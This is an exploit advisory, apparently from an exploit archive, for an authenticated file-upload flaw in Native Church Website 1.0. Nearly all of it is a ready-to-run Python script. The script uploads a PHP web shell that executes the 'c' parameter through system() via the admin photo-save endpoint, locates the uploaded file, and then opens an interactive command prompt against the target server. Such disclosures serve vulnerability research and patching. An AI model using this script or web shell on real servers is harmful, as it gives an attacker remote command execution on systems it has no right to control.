Native Church Website 1.0 Shell Upload

2021.04.13
Credit: Richard Jones
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Native Church Website - Arbitrary File Upload (Authenticated) # Date: 04/21 # Exploit Author: Richard Jones # Vendor Homepage: https://www.sourcecodester.com/php/11764/native-church-website-phpmysql.html # Version: 1.0 # Tested on: Windows 10 build 19041 + xampp 3.2.4 #/usr/bin/python3 import requests import re from requests.models import ReadTimeoutError import sys s = requests.Session() TARGET = "192.168.1.207" # <<< CHANGE ME UPLOADS_URL = f"http://{TARGET}/native/admin/save-photo.php" GALLERY_URL = f"http://{TARGET}/native/uploads/" def get(url): r = s.get(url) return r.text def banner(): ban = """ _______ __ __ \ \ ____/ \ / \ ______ ______ / | \_/ ___\ \/\/ / \____ \/ ___/ / | \ \___\ / | |_> >___ \ \____|__ /\___ >\__/\ / /\ | __/____ > \/ \/ \/ \/ |__| \/ """ return ban def uploadShell(): data = ( ('file', ("file.php", "<?php system($_GET['c']);?>")), ('caption', (None, 'simprevshell')), ) r = s.post(UPLOADS_URL, files=data) if r.status_code == 200: return True else: return False def getLink(page): matchObj = re.findall("href=\"(.*?).php\"", page) return matchObj def testURL(url): r = s.get(url) return r.status_code def getUploadLink(uploads): if len(NEW_UPLOADS) > 1: for l in NEW_UPLOADS: link = f"{GALLERY_URL}{l}.php" if testURL(link) == 200: return link uploadShell() # Get upload link. NEW_UPLOADS=getLink(get(GALLERY_URL)) shellUrl = getUploadLink(NEW_UPLOADS) print("\033[34;1m" + banner() + "\033[0m") print("\033[37m" + "Created by: Richard Jones aka Ac1d" +"\033[0m") #Run webshell. while True: print() try: cmd = input("\033[91mac1d\033[0m>") if cmd == "exit": sys.exit() r = s.get(f"{shellUrl}?c={cmd}", verify=False) if r.status_code == 200: print(r.text) else: raise Exception except KeyboardInterrupt: sys.exit()

